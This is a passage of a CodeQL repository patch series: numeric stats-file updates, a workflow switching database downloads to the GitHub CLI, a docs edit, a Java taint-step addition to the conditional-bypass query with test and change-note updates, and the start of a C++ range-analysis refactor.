3 - 2011094 + 2011076 3 4 - 858366 + 858358 4 5 - 456927 + 456923 5 7 - 614059 + 614054 7 12757 - 418567 + 418563 @@ -38707,27 +38707,27 @@ 1 2 - 2033124 + 2033105 2 3 - 586123 + 586118 3 4 - 222572 + 222570 4 8 - 285561 + 285558 8 508819 - 238548 + 238546 @@ -38743,22 +38743,22 @@ 1 2 - 2303713 + 2303692 2 3 - 542595 + 542590 3 5 - 273778 + 273775 5 78481 - 245842 + 245840 @@ -38774,27 +38774,27 @@ 1 2 - 2200592 + 2200572 2 3 - 562588 + 562582 3 4 - 209874 + 209872 4 9 - 261818 + 261816 9 207300 - 131056 + 131055 @@ -38804,15 +38804,15 @@ cil_method_source_declaration - 34929152 + 34928825 method - 34929152 + 34928825 source - 30419382 + 30419098 @@ -38826,7 +38826,7 @@ 1 2 - 34929152 + 34928825 @@ -38842,12 +38842,12 @@ 1 2 - 28648401 + 28648133 2 981 - 1770981 + 1770964 @@ -38857,15 +38857,15 @@ cil_method_implementation - 27073001 + 27072747 id - 27073001 + 27072747 method - 27049967 + 27049714 location @@ -38883,7 +38883,7 @@ 1 2 - 27073001 + 27072747 @@ -38899,7 +38899,7 @@ 1 2 - 27073001 + 27072747 @@ -38915,12 +38915,12 @@ 1 2 - 27047073 + 27046820 2 27 - 2894 + 2893 @@ -38936,7 +38936,7 @@ 1 2 - 27049967 + 27049714 @@ -39098,15 +39098,15 @@ cil_implements - 1403915 + 1403902 id - 1403325 + 1403311 decl - 259544 + 259542 @@ -39120,7 +39120,7 @@ 1 2 - 1402734 + 1402721 2 @@ -39141,12 +39141,12 @@ 1 2 - 169860 + 169858 2 3 - 42701 + 42700 3 @@ -39156,12 +39156,12 @@ 4 10 - 19815 + 19814 10 3161 - 10129 + 10128 @@ -39171,23 +39171,23 @@ cil_field - 15899467 + 15899318 id - 15899467 + 15899318 parent - 3685983 + 3685949 name - 6243572 + 6243513 field_type - 3062916 + 3062888 @@ -39201,7 +39201,7 @@ 1 2 - 15899467 + 15899318 @@ -39217,7 +39217,7 @@ 1 2 - 15899467 + 15899318 @@ -39233,7 +39233,7 @@ 1 2 - 15899467 + 15899318 @@ -39249,42 +39249,42 @@ 1 2 - 1083833 + 1083822 2 3 - 913352 + 913344 3 4 - 486546 + 486542 4 5 - 328173 + 328170 5 6 - 220977 + 220975 6 8 - 262556 + 262554 8 15 - 285797 + 285794 15 6824 - 104745 + 104744 @@ -39300,42 +39300,42 @@ 1 2 - 1083833 + 1083822 2 3 - 913352 + 913344 3 4 - 486546 + 486542 4 5 - 328173 + 328170 5 6 - 220977 + 220975 6 8 - 262556 + 262554 8 15 - 285797 + 285794 15 6824 - 104745 + 104744 @@ -39351,32 +39351,32 @@ 1 2 - 1248614 + 1248602 2 3 - 1218965 + 1218953 3 4 - 465934 + 465929 4 5 - 247702 + 247700 5 8 - 323921 + 323918 8 524 - 180845 + 180843 @@ -39392,22 +39392,22 @@ 1 2 - 4788627 + 4788582 2 3 - 792897 + 792889 3 8 - 498152 + 498147 8 13940 - 163894 + 163893 @@ -39423,22 +39423,22 @@ 1 2 - 4788627 + 4788582 2 3 - 792897 + 792889 3 8 - 498152 + 498147 8 13940 - 163894 + 163893 @@ -39454,17 +39454,17 @@ 1 2 - 5453746 + 5453695 2 3 - 488968 + 488963 3 12921 - 300858 + 300855 @@ -39480,27 +39480,27 @@ 1 2 - 1844158 + 1844140 2 3 - 591203 + 591197 3 4 - 171750 + 171748 4 7 - 244247 + 244245 7 58308 - 211557 + 211555 @@ -39516,22 +39516,22 @@ 1 2 - 2063098 + 2063079 2 3 - 593654 + 593648 3 6 - 251807 + 251805 6 22697 - 154356 + 154355 @@ -39547,22 +39547,22 @@ 1 2 - 2244002 + 2243981 2 3 - 356316 + 356313 3 5 - 237987 + 237985 5 33056 - 224609 + 224607 @@ -39572,15 +39572,15 @@ cil_parameter - 75119038 + 75118336 id - 75119038 + 75118336 parameterizable - 37743421 + 37743068 index @@ -39588,7 +39588,7 @@ param_type - 9706924 + 9706833 @@ -39602,7 +39602,7 @@ 1 2 - 75119038 + 75118336 @@ -39618,7 +39618,7 @@ 1 2 - 75119038 + 75118336 @@ -39634,7 +39634,7 @@ 1 2 - 75119038 + 75118336 @@ -39650,27 +39650,27 @@ 1 2 - 16498466 + 16498312 2 3 - 12068636 + 12068523 3 4 - 5792078 + 5792024 4 7 - 2932037 + 2932009 7 57 - 452202 + 452198 @@ -39686,27 +39686,27 @@ 1 2 - 16498466 + 16498312 2 3 - 12068636 + 12068523 3 4 - 5792078 + 5792024 4 7 - 2932037 + 2932009 7 57 - 452202 + 452198 @@ -39722,22 +39722,22 @@ 1 2 - 16985988 + 16985829 2 3 - 12300274 + 12300159 3 4 - 5685768 + 5685715 4 43 - 2771390 + 2771364 @@ -39936,42 +39936,42 @@ 1 2 - 2729575 + 2729549 2 3 - 2863142 + 2863115 3 4 - 1063663 + 1063653 4 5 - 653955 + 653949 5 7 - 740805 + 740798 7 11 - 735224 + 735217 11 36 - 733481 + 733474 36 108909 - 187076 + 187074 @@ -39987,42 +39987,42 @@ 1 2 - 2768466 + 2768441 2 3 - 2861370 + 2861343 3 4 - 1055365 + 1055355 4 5 - 645096 + 645090 5 7 - 739919 + 739912 7 11 - 731916 + 731909 11 37 - 728668 + 728661 37 89965 - 176120 + 176119 @@ -40038,17 +40038,17 @@ 1 2 - 6826329 + 6826265 2 3 - 2083267 + 2083248 3 6 - 729111 + 729104 6 @@ -40063,37 +40063,37 @@ cil_parameter_in - 358354 + 358350 id - 358354 + 358350 cil_parameter_out - 683899 + 683893 id - 683899 + 683893 cil_setter - 1074353 + 1074343 prop - 1074353 + 1074343 method - 1074353 + 1074343 @@ -40107,7 +40107,7 @@ 1 2 - 1074353 + 1074343 @@ -40123,7 +40123,7 @@ 1 2 - 1074353 + 1074343 @@ -40133,11 +40133,11 @@ cil_custom_modifiers - 217995 + 217993 id - 197796 + 197794 modifier @@ -40159,7 +40159,7 @@ 1 2 - 177744 + 177743 2 @@ -40180,12 +40180,12 @@ 1 2 - 196349 + 196347 2 3 - 1447 + 1446 @@ -40349,11 +40349,11 @@ cil_type_annotation - 1751904 + 1751888 id - 1751904 + 1751888 annotation @@ -40371,7 +40371,7 @@ 1 2 - 1751904 + 1751888 @@ -40397,15 +40397,15 @@ cil_getter - 5994363 + 5994307 prop - 5994363 + 5994307 method - 5994363 + 5994307 @@ -40419,7 +40419,7 @@ 1 2 - 5994363 + 5994307 @@ -40435,7 +40435,7 @@ 1 2 - 5994363 + 5994307 @@ -40445,15 +40445,15 @@ cil_adder - 70696 + 70695 event - 70696 + 70695 method - 70873 + 70872 @@ -40467,7 +40467,7 @@ 1 2 - 70696 + 70695 @@ -40483,7 +40483,7 @@ 1 2 - 70873 + 70872 @@ -40493,15 +40493,15 @@ cil_remover - 70696 + 70695 event - 70696 + 70695 method - 70873 + 70872 @@ -40515,7 +40515,7 @@ 1 2 - 70696 + 70695 @@ -40531,7 +40531,7 @@ 1 2 - 70873 + 70872 @@ -40589,23 +40589,23 @@ cil_property - 6002749 + 6002693 id - 6002749 + 6002693 parent - 1591435 + 1591420 name - 1540967 + 1540952 property_type - 706667 + 706661 @@ -40619,7 +40619,7 @@ 1 2 - 6002749 + 6002693 @@ -40635,7 +40635,7 @@ 1 2 - 6002749 + 6002693 @@ -40651,7 +40651,7 @@ 1 2 - 6002749 + 6002693 @@ -40667,32 +40667,32 @@ 1 2 - 521629 + 521624 2 3 - 392402 + 392399 3 4 - 215484 + 215482 4 5 - 137258 + 137257 5 7 - 139502 + 139501 7 13 - 124442 + 124440 13 @@ -40713,37 +40713,37 @@ 1 2 - 624838 + 624832 2 3 - 291408 + 291405 3 4 - 215544 + 215542 4 5 - 136520 + 136518 5 7 - 139738 + 139737 7 13 - 124087 + 124086 13 2090 - 59297 + 59296 @@ -40759,27 +40759,27 @@ 1 2 - 615625 + 615619 2 3 - 481851 + 481846 3 4 - 202137 + 202135 4 5 - 101053 + 101052 5 8 - 125268 + 125267 8 @@ -40800,27 +40800,27 @@ 1 2 - 979206 + 979196 2 3 - 254760 + 254758 3 4 - 95118 + 95117 4 8 - 120248 + 120247 8 7161 - 91633 + 91632 @@ -40836,27 +40836,27 @@ 1 2 - 979206 + 979196 2 3 - 255203 + 255201 3 4 - 95177 + 95176 4 8 - 120219 + 120218 8 3695 - 91161 + 91160 @@ -40872,17 +40872,17 @@ 1 2 - 1346862 + 1346849 2 3 - 113161 + 113160 3 1330 - 80943 + 80942 @@ -40898,17 +40898,17 @@ 1 2 - 410209 + 410206 2 3 - 125239 + 125238 3 4 - 46038 + 46037 4 @@ -40918,7 +40918,7 @@ 7 34 - 53096 + 53095 34 @@ -40939,12 +40939,12 @@ 1 2 - 430172 + 430168 2 3 - 118831 + 118830 3 @@ -40959,12 +40959,12 @@ 7 64 - 53007 + 53006 64 17546 - 4843 + 4842 @@ -40980,12 +40980,12 @@ 1 2 - 559812 + 559806 2 3 - 81534 + 81533 3 @@ -41005,15 +41005,15 @@ cil_event - 70696 + 70695 id - 70696 + 70695 parent - 30062 + 30061 name @@ -41021,7 +41021,7 @@ event_type - 21380 + 21379 @@ -41035,7 +41035,7 @@ 1 2 - 70696 + 70695 @@ -41051,7 +41051,7 @@ 1 2 - 70696 + 70695 @@ -41067,7 +41067,7 @@ 1 2 - 70696 + 70695 @@ -41083,7 +41083,7 @@ 1 2 - 16478 + 16477 2 @@ -41124,7 +41124,7 @@ 1 2 - 16478 + 16477 2 @@ -41165,7 +41165,7 @@ 1 2 - 19815 + 19814 2 @@ -41273,7 +41273,7 @@ 1 2 - 30121 + 30120 2 @@ -41304,7 +41304,7 @@ 2 3 - 4341 + 4340 3 @@ -41386,15 +41386,15 @@ cil_local_variable - 23026507 + 23026292 id - 23026507 + 23026292 impl - 6649736 + 6649674 index @@ -41402,7 +41402,7 @@ var_type - 2957964 + 2957937 @@ -41416,7 +41416,7 @@ 1 2 - 23026507 + 23026292 @@ -41432,7 +41432,7 @@ 1 2 - 23026507 + 23026292 @@ -41448,7 +41448,7 @@ 1 2 - 23026507 + 23026292 @@ -41464,37 +41464,37 @@ 1 2 - 2714986 + 2714961 2 3 - 1154972 + 1154961 3 4 - 783477 + 783469 4 5 - 524995 + 524990 5 6 - 385197 + 385193 6 9 - 558778 + 558773 9 29 - 498801 + 498797 29 @@ -41515,37 +41515,37 @@ 1 2 - 2714986 + 2714961 2 3 - 1154972 + 1154961 3 4 - 783477 + 783469 4 5 - 524995 + 524990 5 6 - 385197 + 385193 6 9 - 558778 + 558773 9 29 - 498801 + 498797 29 @@ -41566,37 +41566,37 @@ 1 2 - 2973084 + 2973056 2 3 - 1271618 + 1271606 3 4 - 818854 + 818847 4 5 - 500130 + 500126 5 7 - 537339 + 537334 7 16 - 498831 + 498826 16 163 - 49877 + 49876 @@ -41770,27 +41770,27 @@ 1 2 - 1877350 + 1877333 2 3 - 375954 + 375950 3 4 - 175411 + 175410 4 7 - 232849 + 232846 7 29 - 223664 + 223662 29 @@ -41811,27 +41811,27 @@ 1 2 - 1959652 + 1959634 2 3 - 358679 + 358675 3 5 - 267754 + 267751 5 12 - 222070 + 222068 12 44190 - 149808 + 149807 @@ -41847,27 +41847,27 @@ 1 2 - 2018536 + 2018517 2 3 - 391103 + 391099 3 4 - 185275 + 185273 4 8 - 239434 + 239432 8 217 - 123615 + 123614 @@ -41877,11 +41877,11 @@ cil_function_pointer_calling_conventions - 39912 + 39911 id - 39912 + 39911 kind @@ -41899,7 +41899,7 @@ 1 2 - 39912 + 39911 @@ -41930,15 +41930,15 @@ cil_handler - 2378514 + 2378492 id - 2378514 + 2378492 impl - 1552395 + 1552381 index @@ -41950,15 +41950,15 @@ try_start - 2323145 + 2323123 try_end - 2349486 + 2349464 handler_start - 2378514 + 2378492 @@ -41972,7 +41972,7 @@ 1 2 - 2378514 + 2378492 @@ -41988,7 +41988,7 @@ 1 2 - 2378514 + 2378492 @@ -42004,7 +42004,7 @@ 1 2 - 2378514 + 2378492 @@ -42020,7 +42020,7 @@ 1 2 - 2378514 + 2378492 @@ -42036,7 +42036,7 @@ 1 2 - 2378514 + 2378492 @@ -42052,7 +42052,7 @@ 1 2 - 2378514 + 2378492 @@ -42068,22 +42068,22 @@ 1 2 - 1142805 + 1142795 2 3 - 247407 + 247405 3 5 - 119658 + 119656 5 83 - 42524 + 42523 @@ -42099,22 +42099,22 @@ 1 2 - 1142805 + 1142795 2 3 - 247407 + 247405 3 5 - 119658 + 119656 5 83 - 42524 + 42523 @@ -42130,12 +42130,12 @@ 1 2 - 1453556 + 1453543 2 4 - 98839 + 98838 @@ -42151,17 +42151,17 @@ 1 2 - 1161321 + 1161310 2 3 - 240615 + 240613 3 6 - 125918 + 125917 6 @@ -42182,22 +42182,22 @@ 1 2 - 1153171 + 1153160 2 3 - 244070 + 244068 3 6 - 128989 + 128988 6 83 - 26164 + 26163 @@ -42213,22 +42213,22 @@ 1 2 - 1142805 + 1142795 2 3 - 247407 + 247405 3 5 - 119658 + 119656 5 83 - 42524 + 42523 @@ -42766,12 +42766,12 @@ 1 2 - 2279616 + 2279595 2 9 - 43528 + 43527 @@ -42787,7 +42787,7 @@ 1 2 - 2323145 + 2323123 @@ -42803,12 +42803,12 @@ 1 2 - 2279616 + 2279595 2 9 - 43528 + 43527 @@ -42824,7 +42824,7 @@ 1 2 - 2305987 + 2305966 2 @@ -42845,7 +42845,7 @@ 1 2 - 2299727 + 2299705 2 @@ -42866,12 +42866,12 @@ 1 2 - 2279616 + 2279595 2 9 - 43528 + 43527 @@ -42887,7 +42887,7 @@ 1 2 - 2326836 + 2326814 2 @@ -42908,7 +42908,7 @@ 1 2 - 2349486 + 2349464 @@ -42924,7 +42924,7 @@ 1 2 - 2326836 + 2326814 2 @@ -42945,7 +42945,7 @@ 1 2 - 2347537 + 2347515 2 @@ -42966,7 +42966,7 @@ 1 2 - 2349486 + 2349464 @@ -42982,7 +42982,7 @@ 1 2 - 2326836 + 2326814 2 @@ -43003,7 +43003,7 @@ 1 2 - 2378514 + 2378492 @@ -43019,7 +43019,7 @@ 1 2 - 2378514 + 2378492 @@ -43035,7 +43035,7 @@ 1 2 - 2378514 + 2378492 @@ -43051,7 +43051,7 @@ 1 2 - 2378514 + 2378492 @@ -43067,7 +43067,7 @@ 1 2 - 2378514 + 2378492 @@ -43083,7 +43083,7 @@ 1 2 - 2378514 + 2378492 @@ -43141,11 +43141,11 @@ cil_handler_type - 400819 + 400815 id - 400819 + 400815 catch_type @@ -43163,7 +43163,7 @@ 1 2 - 400819 + 400815 @@ -43224,11 +43224,11 @@ cil_method_stack_size - 27072292 + 27072039 method - 27072292 + 27072039 size @@ -43246,7 +43246,7 @@ 1 2 - 27072292 + 27072039 @@ -43317,121 +43317,121 @@ cil_public - 30557526 + 30557240 id - 30557526 + 30557240 cil_private - 15498766 + 15498621 id - 15498766 + 15498621 cil_protected - 28744228 + 28743959 id - 28744228 + 28743959 cil_internal - 986884 + 986874 id - 986884 + 986874 cil_static - 14521686 + 14521550 id - 14521686 + 14521550 cil_sealed - 6359922 + 6359863 id - 6359922 + 6359863 cil_virtual - 11734704 + 11734594 id - 11734704 + 11734594 cil_abstract - 2826199 + 2826172 id - 2826199 + 2826172 cil_class - 4475041 + 4475000 id - 4475041 + 4475000 cil_interface - 367479 + 367475 id - 367479 + 367475 cil_security - 48814 + 48813 id - 48814 + 48813 @@ -43449,37 +43449,37 @@ cil_specialname - 12520543 + 12520426 id - 12520543 + 12520426 cil_newslot - 7370933 + 7370864 id - 7370933 + 7370864 cil_base_class - 4460424 + 4460382 id - 4460424 + 4460382 base - 462242 + 462238 @@ -43493,7 +43493,7 @@ 1 2 - 4460424 + 4460382 @@ -43509,12 +43509,12 @@ 1 2 - 280600 + 280597 2 3 - 90068 + 90067 3 @@ -43524,7 +43524,7 @@ 4 8 - 38242 + 38241 8 @@ -43539,15 +43539,15 @@ cil_base_interface - 2925894 + 2925867 id - 1244479 + 1244468 base - 538638 + 538633 @@ -43561,32 +43561,32 @@ 1 2 - 703478 + 703472 2 3 - 199095 + 199093 3 4 - 95531 + 95530 4 5 - 46540 + 46539 5 6 - 123792 + 123791 6 32 - 76041 + 76040 @@ -43602,7 +43602,7 @@ 1 2 - 358649 + 358646 2 @@ -43612,12 +43612,12 @@ 3 4 - 31834 + 31833 4 8 - 43203 + 43202 8 @@ -43637,11 +43637,11 @@ cil_enum_underlying_type - 203849 + 203848 id - 203849 + 203848 underlying @@ -43659,7 +43659,7 @@ 1 2 - 203849 + 203848 @@ -43720,11 +43720,11 @@ cil_type_parameter - 1773609 + 1773592 unbound - 1331358 + 1331346 index @@ -43732,7 +43732,7 @@ param - 1773609 + 1773592 @@ -43746,17 +43746,17 @@ 1 2 - 994443 + 994434 2 3 - 282460 + 282457 3 43 - 54454 + 54453 @@ -43772,17 +43772,17 @@ 1 2 - 994443 + 994434 2 3 - 282460 + 282457 3 43 - 54454 + 54453 @@ -43920,7 +43920,7 @@ 1 2 - 1773609 + 1773592 @@ -43936,7 +43936,7 @@ 1 2 - 1773609 + 1773592 @@ -43946,11 +43946,11 @@ cil_type_argument - 11206076 + 11205971 bound - 8383213 + 8383135 index @@ -43958,7 +43958,7 @@ t - 2800094 + 2800068 @@ -43972,17 +43972,17 @@ 1 2 - 5919148 + 5919093 2 3 - 2202955 + 2202934 3 43 - 261109 + 261107 @@ -43998,17 +43998,17 @@ 1 2 - 6030449 + 6030393 2 3 - 2159013 + 2158993 3 43 - 193750 + 193748 @@ -44141,32 +44141,32 @@ 1 2 - 1210194 + 1210183 2 3 - 732418 + 732411 3 4 - 295483 + 295480 4 6 - 237455 + 237453 6 12 - 215160 + 215158 12 14769 - 109381 + 109380 @@ -44182,17 +44182,17 @@ 1 2 - 2254043 + 2254022 2 3 - 502079 + 502075 3 10 - 43971 + 43970 @@ -44293,19 +44293,19 @@ cil_attribute - 5874527 + 5874473 attributeid - 5874527 + 5874473 element - 5184131 + 5184082 constructor - 27995 + 27994 @@ -44319,7 +44319,7 @@ 1 2 - 5874527 + 5874473 @@ -44335,7 +44335,7 @@ 1 2 - 5874527 + 5874473 @@ -44351,12 +44351,12 @@ 1 2 - 4807940 + 4807895 2 3520 - 376190 + 376187 @@ -44372,12 +44372,12 @@ 1 2 - 4812458 + 4812413 2 9 - 371672 + 371669 @@ -44529,11 +44529,11 @@ cil_attribute_named_argument - 261818 + 261816 attribute_id - 161089 + 161088 param @@ -44541,7 +44541,7 @@ value - 119569 + 119568 @@ -44555,7 +44555,7 @@ 1 2 - 97510 + 97509 2 @@ -44570,7 +44570,7 @@ 4 6 - 12137 + 12136 7 @@ -44591,7 +44591,7 @@ 1 2 - 103711 + 103710 2 @@ -44754,7 +44754,7 @@ 1 2 - 101171 + 101170 2 @@ -44780,7 +44780,7 @@ 1 2 - 112925 + 112924 2 @@ -44795,11 +44795,11 @@ cil_attribute_positional_argument - 1757367 + 1757351 attribute_id - 1528150 + 1528136 index @@ -44807,7 +44807,7 @@ value - 440478 + 440474 @@ -44821,12 +44821,12 @@ 1 2 - 1317006 + 1316994 2 3 - 194104 + 194103 3 @@ -44847,12 +44847,12 @@ 1 2 - 1318276 + 1318264 2 3 - 194222 + 194221 3 @@ -44940,12 +44940,12 @@ 1 2 - 324925 + 324922 2 3 - 75273 + 75272 3 @@ -44971,7 +44971,7 @@ 1 2 - 400848 + 400845 2 @@ -44991,19 +44991,19 @@ metadata_handle - 109731032 + 109730006 entity - 109393999 + 109392976 location - 14588 + 14587 handle - 2756447 + 2756422 @@ -45017,12 +45017,12 @@ 1 2 - 109222337 + 109221316 2 495 - 171661 + 171659 @@ -45038,12 +45038,12 @@ 1 2 - 109225527 + 109224505 2 104 - 168472 + 168470 @@ -45206,7 +45206,7 @@ 2 3 - 373149 + 373145 3 @@ -45216,57 +45216,57 @@ 4 5 - 360687 + 360683 5 8 - 210051 + 210049 8 11 - 237367 + 237364 11 15 - 233026 + 233024 15 22 - 101939 + 101938 22 25 - 223103 + 223101 25 39 - 216105 + 216103 39 51 - 211143 + 211142 51 73 - 210317 + 210315 73 137 - 207807 + 207805 137 732 - 169801 + 169799 @@ -45282,62 +45282,62 @@ 1 2 - 373651 + 373647 2 3 - 362134 + 362130 3 4 - 205326 + 205324 4 6 - 242092 + 242089 6 8 - 233026 + 233024 8 11 - 101733 + 101732 11 13 - 223192 + 223190 13 20 - 216134 + 216132 20 26 - 210523 + 210521 26 37 - 210996 + 210994 37 70 - 209903 + 209901 70 495 - 167733 + 167732 From fd809742104647a3cf1892d28cc5ab791549db5b Mon Sep 17 00:00:00 2001 From: Michael Nebel Date: Thu, 12 Jan 2023 15:00:29 +0100 Subject: [PATCH 239/381] Java: Download databases using the gh api instead of lgtm. --- .github/workflows/mad_modelDiff.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/.github/workflows/mad_modelDiff.yml b/.github/workflows/mad_modelDiff.yml index 2affe5f3bd7..018e53a49c5 100644 --- a/.github/workflows/mad_modelDiff.yml +++ b/.github/workflows/mad_modelDiff.yml @@ -40,12 +40,12 @@ jobs: - name: Download database env: SLUG: ${{ matrix.slug }} + GH_TOKEN: ${{ github.token }} run: | set -x mkdir lib-dbs SHORTNAME=${SLUG//[^a-zA-Z0-9_]/} - projectId=`curl -s https://lgtm.com/api/v1.0/projects/g/${SLUG} | jq .id` - curl -L "https://lgtm.com/api/v1.0/snapshots/$projectId/java" -o "$SHORTNAME.zip" + gh api -H "Accept: application/zip" "/repos/${SLUG}/code-scanning/codeql/databases/java" > "$SHORTNAME.zip" unzip -q -d "${SHORTNAME}-db" "${SHORTNAME}.zip" mkdir "lib-dbs/$SHORTNAME/" mv "${SHORTNAME}-db/"$(ls -1 "${SHORTNAME}"-db)/* "lib-dbs/${SHORTNAME}/" From 4acd1ababe111d37d3ec00fd004d22f5e8fbe0ec Mon Sep 17 00:00:00 2001 From: Sarita Iyer <66540150+saritai@users.noreply.github.com> Date: Thu, 12 Jan 2023 15:57:43 -0500 Subject: [PATCH 240/381] Update docs/codeql/CONTRIBUTING.MD Co-authored-by: Felicity Chapman --- docs/codeql/CONTRIBUTING.MD | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/codeql/CONTRIBUTING.MD b/docs/codeql/CONTRIBUTING.MD index 478c2d28ac5..ed07e78b1b9 100644 --- a/docs/codeql/CONTRIBUTING.MD +++ b/docs/codeql/CONTRIBUTING.MD @@ -8,7 +8,7 @@ To make changes to the documentation on [codeql.github.com](https://codeql.githu ## Contributing to CodeQL CLI docs on `docs.github.com` -We are in the process of moving all documentation about the CodeQL CLI from [codeql.github.com](https://codeql.github.com/docs/codeql-cli/) to the public [github/docs](https://github.com/github/docs) repository so that this documentation is published on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories. This will make it easier for code scanning users to find information about using CodeQL to query their codebases. +We are in the process of moving all documentation about the CodeQL CLI from [github/codeql](https://github.com/github/codeql/tree/main/docs/codeql) to the public [github/docs](https://github.com/github/docs) repository so that this documentation is published on the [GitHub Docs](https://docs.github.com/en/code-security/code-scanning) site. This includes all articles that are currently published under "[Using the CodeQL CLI](https://codeql.github.com/docs/codeql-cli/using-the-codeql-cli/)" and "[CodeQL CLI reference](https://codeql.github.com/docs/codeql-cli/codeql-cli-reference/)" categories on the CodeQL microsite. This will make it easier for code scanning users to find information about using CodeQL to query their codebases. **Note**: For a brief time, we will have source files for CodeQL CLI documentation in two locations. During this period we will not accept changes to the old files in the `codeql` repository, only to the new files in the `docs` repository. From ffb267937acb5585c69460d86eb54d13e177df21 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 12 Jan 2023 16:24:05 -0500 Subject: [PATCH 241/381] Java: add endsWith additionalTaintStep to ConditionalBypassFlowConfig --- .../java/security/ConditionalBypassQuery.qll | 17 +++++++++++++++++ 1 file changed, 17 insertions(+) diff --git a/java/ql/lib/semmle/code/java/security/ConditionalBypassQuery.qll b/java/ql/lib/semmle/code/java/security/ConditionalBypassQuery.qll index 3bff0ae0a80..9bff32eac02 100644 --- a/java/ql/lib/semmle/code/java/security/ConditionalBypassQuery.qll +++ b/java/ql/lib/semmle/code/java/security/ConditionalBypassQuery.qll @@ -23,6 +23,19 @@ predicate conditionControlsMethod(MethodAccess ma, Expr e) { ) } +/** + * Holds if `node1` to `node2` is a dataflow step through the + * `endsWith` method of the `java.lang.String` class. + */ +private predicate endsWithStep(DataFlow::Node node1, DataFlow::Node node2) { + exists(MethodAccess ma | + ma.getMethod().getDeclaringType() instanceof TypeString and + ma.getMethod().getName() = "endsWith" and + ma.getQualifier() = node1.asExpr() and + ma = node2.asExpr() + ) +} + /** * A taint tracking configuration for untrusted data flowing to sensitive conditions. */ @@ -32,4 +45,8 @@ class ConditionalBypassFlowConfig extends TaintTracking::Configuration { override predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } override predicate isSink(DataFlow::Node sink) { conditionControlsMethod(_, sink.asExpr()) } + + override predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { + endsWithStep(node1, node2) + } } From a39b2aaaac8f9904979f9e9b8a582ba3290916d6 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 12 Jan 2023 16:24:57 -0500 Subject: [PATCH 242/381] Java: remove endsWith test case --- java/ql/test/library-tests/dataflow/taint/B.java | 8 ++++---- java/ql/test/library-tests/dataflow/taint/test.expected | 1 - 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/java/ql/test/library-tests/dataflow/taint/B.java b/java/ql/test/library-tests/dataflow/taint/B.java index af659283b13..5bd50862302 100644 --- a/java/ql/test/library-tests/dataflow/taint/B.java +++ b/java/ql/test/library-tests/dataflow/taint/B.java @@ -58,19 +58,19 @@ public class B { // non-whitelisted constructors don't pass taint StringWrapper herring = new StringWrapper(complex); sink(herring); - // toString does not pass taint yet + // toString does not pass taint yet String valueOfObject = String.valueOf(args); sink(valueOfObject); - + // tainted equality check with constant boolean cond = "foo" == s; sink(cond); // tainted logic with tainted operand boolean logic = cond && safe(); sink(logic); - // tainted condition - sink(concat.endsWith("I'm tainted")); + + // tainted logic = safe() || cond; sink(logic); diff --git a/java/ql/test/library-tests/dataflow/taint/test.expected b/java/ql/test/library-tests/dataflow/taint/test.expected index 8b7d85321b4..aee1744af9b 100644 --- a/java/ql/test/library-tests/dataflow/taint/test.expected +++ b/java/ql/test/library-tests/dataflow/taint/test.expected @@ -18,7 +18,6 @@ | B.java:15:21:15:27 | taint(...) | B.java:51:10:51:21 | fluentConcat | | B.java:15:21:15:27 | taint(...) | B.java:68:10:68:13 | cond | | B.java:15:21:15:27 | taint(...) | B.java:71:10:71:14 | logic | -| B.java:15:21:15:27 | taint(...) | B.java:73:10:73:39 | endsWith(...) | | B.java:15:21:15:27 | taint(...) | B.java:76:10:76:14 | logic | | B.java:15:21:15:27 | taint(...) | B.java:79:10:79:14 | logic | | B.java:15:21:15:27 | taint(...) | B.java:87:10:87:16 | trimmed | From c3a1d088ace1905fd9b34b23de80300530683989 Mon Sep 17 00:00:00 2001 From: Jami Cogswell Date: Thu, 12 Jan 2023 16:32:52 -0500 Subject: [PATCH 243/381] Java: update change note --- java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md b/java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md index a74fb161e58..1272c00953e 100644 --- a/java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md +++ b/java/ql/lib/change-notes/2023-01-03-add-more-top-jdk-models.md @@ -2,3 +2,5 @@ category: minorAnalysis --- * Added more dataflow models for frequently-used JDK APIs. +* Removed summary model for `java.lang.String#endsWith(String)` and added neutral model for this API. +* Added additional taint step for `java.lang.String#endsWith(String)` to `ConditionalBypassFlowConfig`. From edbe95837f0ec4170d553fb820132b626825eca4 Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Tue, 13 Dec 2022 11:45:08 -0500 Subject: [PATCH 244/381] Convert RangeAnalysis to trivial parameterized mod --- .../cpp/semantic/analysis/RangeAnalysis.qll | 1371 +++++++++-------- 1 file changed, 689 insertions(+), 682 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll index 4953b994c8e..63f2ebe5fa5 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll @@ -70,262 +70,6 @@ private import ModulusAnalysis private import experimental.semmle.code.cpp.semantic.Semantic private import ConstantAnalysis -cached -private module RangeAnalysisCache { - cached - module RangeAnalysisPublic { - /** - * Holds if `b + delta` is a valid bound for `e`. - * - `upper = true` : `e <= b + delta` - * - `upper = false` : `e >= b + delta` - * - * The reason for the bound is given by `reason` and may be either a condition - * or `NoReason` if the bound was proven directly without the use of a bounding - * condition. - */ - cached - predicate semBounded(SemExpr e, SemBound b, int delta, boolean upper, SemReason reason) { - bounded(e, b, delta, upper, _, _, reason) and - bestBound(e, b, delta, upper) - } - } - - /** - * Holds if `guard = boundFlowCond(_, _, _, _, _) or guard = eqFlowCond(_, _, _, _, _)`. - */ - cached - predicate possibleReason(SemGuard guard) { - guard = boundFlowCond(_, _, 